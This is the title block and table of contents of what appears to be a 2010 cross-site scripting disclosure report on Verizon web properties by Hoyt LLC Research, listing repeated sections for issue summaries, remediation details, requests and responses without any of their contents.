...[SNIP]...

Report generated by XSS.CX at Fri Nov 19 21:24:27 CST 2010.

Current Research | Full Disclosure | As of March 14, 2011

Cross Site Scripting Report for Verizon Web Properties | Hoyt LLC Research

Contents

Issue background

Remediation background

Summary

Issue detail

Remediation detail

Request

Response (redirected)

Summary

Issue detail

Remediation detail

Request

Response (redirected)

Summary

Issue detail

Remediation detail

Request

Response (redirected)

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response (redirected)

Summary

Issue detail

Remediation detail

Request

Response (redirected)

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail